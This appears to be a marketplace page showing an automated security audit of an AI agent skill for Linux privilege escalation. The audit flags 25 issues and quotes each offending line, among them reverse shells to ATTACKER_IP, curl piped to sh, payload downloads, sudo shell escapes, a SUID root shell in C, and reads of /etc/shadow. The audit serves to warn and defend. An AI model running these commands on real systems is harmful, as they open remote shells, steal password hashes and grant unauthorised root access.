linux-privilege-escalation

Facilitates privilege escalation assessments on Linux systems to identify and exploit security vulnerabilities for root access.

Install this skill

0/100

Security score

The linux-privilege-escalation skill was audited on Mar 9, 2026 and we found 25 security issues across 4 threat categories, including 10 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 420

Direct command execution function call

SourceSKILL.md

420	perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("

high line 145

Piping content to sh shell

SourceSKILL.md

145	curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh \| sh

medium line 228

System command execution

SourceSKILL.md

228	sudo awk 'BEGIN {system("/bin/bash")}'

medium line 231

System command execution

SourceSKILL.md

231	sudo python -c 'import os; os.system("/bin/bash")'

medium line 251

System command execution

SourceSKILL.md

251	system("/bin/bash");

medium line 323

System command execution

SourceSKILL.md

323	/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

medium line 367

System command execution

SourceSKILL.md

367	# Shows: system("service apache2 start")

medium line 387

System command execution

SourceSKILL.md

387	echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c

medium line 231

Python os.system command execution

SourceSKILL.md

231	sudo python -c 'import os; os.system("/bin/bash")'

medium line 323

Python os.system command execution

SourceSKILL.md

323	/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

medium line 414

Python subprocess execution

SourceSKILL.md

414	python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

medium line 164

Wget to non-GitHub URL

SourceSKILL.md

164	wget http://ATTACKER_IP:8000/linpeas.sh

medium line 200

Wget to non-GitHub URL

SourceSKILL.md

200	wget http://ATTACKER_IP/exploit.c

high line 84

Access to /etc/passwd

SourceSKILL.md

84	cat /etc/passwd \| grep -v nologin \| grep -v false

high line 87

Access to /etc/passwd

SourceSKILL.md

87	cat /etc/passwd \| grep home

high line 234

Access to /etc/passwd

SourceSKILL.md

234	sudo less /etc/passwd

high line 294

Access to /etc/passwd

SourceSKILL.md

294	base64 /etc/passwd \| base64 -d > passwd.txt

high line 307

Access to /etc/passwd

SourceSKILL.md

307	# Add to /etc/passwd (using SUID editor)

high line 277

Access to /etc/shadow

SourceSKILL.md

277	LFILE=/etc/shadow

high line 293

Access to /etc/shadow

SourceSKILL.md

293	base64 /etc/shadow \| base64 -d > shadow.txt

high line 472

Access to /etc/shadow

SourceSKILL.md

472	$ base64 /etc/shadow \| base64 -d

low line 164

External URL reference

SourceSKILL.md

164	wget http://ATTACKER_IP:8000/linpeas.sh

low line 200

External URL reference

SourceSKILL.md

200	wget http://ATTACKER_IP/exploit.c

low line 218

External URL reference

SourceSKILL.md

218	Reference https://gtfobins.github.io for exploitation commands:

low line 424

External URL reference

SourceSKILL.md

424	- GTFOBins: https://gtfobins.github.io

Scanned on Mar 9, 2026

View Security Dashboard

Installation guide →

GitHub Stars 21.5K

Rate this skill

Categorydevelopment

UpdatedApril 4, 2026

openclaw backend security-engineer devops-sre backend-developer development

sickn33/antigravity-awesome-skills